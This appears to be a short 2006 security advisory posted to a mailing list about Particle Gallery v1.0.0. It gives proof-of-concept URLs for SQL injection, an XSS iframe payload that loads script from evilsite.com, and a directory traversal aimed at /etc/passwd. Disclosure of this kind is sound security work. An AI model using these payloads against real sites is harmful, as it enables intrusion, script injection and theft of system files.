Particle Gallery v1.0.0

luny Tue, 06 Jun 2006 09:49:39 -0700

Homepage:

http://www.particlesoft.net/particlegallery/



Effected files:

viewimage.php

viewalbum.php


SQL Injection:

http://www.example.com/viewimage.php?imageid='


XSS Vulnerability proof of concept:

http://www.example.com/viewimage.php?imageid=<iframe%20src=http://evilsite.com/scriptlet.html>


Possible Directory Traversal ?:

http://www.example.com/viewalbum.php?albumid=../../../../etc/passwd/

Particle Gallery v1.0.0

Reply via email to